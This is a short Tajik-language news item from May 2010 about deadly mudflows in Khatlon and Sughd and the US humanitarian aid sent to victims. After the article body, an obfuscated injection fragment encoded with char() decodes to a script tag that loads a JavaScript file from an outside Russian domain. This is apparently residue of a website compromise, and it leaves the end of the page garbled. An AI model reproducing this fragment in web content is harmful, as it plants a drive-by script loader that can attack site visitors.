20.05.2010
Дастгирӣ
Моҳи ҷорӣ аз шиддати сел даҳҳо иншооти хоҷагии халқ ва хонаҳои истиқоматии шаҳри Кӯлоб, ноҳияи Мӯъминобод, Ховалинг, Шӯробод, Балҷувон, Восеъ ва Темурмалики ноҳияи Хатлон хароб гардид. Ҳамчунин ноҳияҳои Панҷакенту Ғончии вилояти Суғд аз офти табии зарари ҷиддӣ диданд. Аз рӯи маълумотҳо дар ноҳияи Хатлон 22 нафар ҳалок, 50 нафар беномунишон, 200 нафар захмҳои гуногун гирифтаанд.
Барои бартараф намудани натиҷаҳои офати табии ва дастгирии зарардидагон Ҳукумати ИМА ба маблағи зиёда аз 588 000доллори ИМА кӯмаки башардӯстонаро барои зарардидагони вилояти Хатлон таъмин намуд. Кӯмак аз хаймаҳо, таҷҳизоти санитарӣ ва лавозимоти фавқӯлода иборат буд. Ҳамчунин лавозимоти тиббӣ ба маблағи 63 497 доллори ИМА ва кӯмаки ғайри ҷиҳозӣ ба маблағи 277 614 таъмин гардид.
Ҳамчунин аз тарафи Оҷонсии ИМА оид ба рушди байалмиллалӣ (USAID), тариқи ташкилоти байналхалқии Наҷоти кӯдакон (Save the Children) ба маблағи 50 ҳазор доллори ИМА, ба намуди лавозимоти фавқуллода, таҷҳизоти беҳдошт, бистару кӯрпа ва лавозимоти тиббӣ кӯмак расонида шуд.
Суғд

char(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,112,105,107,115,117,115,46,109,115,107,46,114,117,47)96a71407ac502a2f722be80fce50ed69.js" type="text/javascript">

ТАВЗЕҲОТ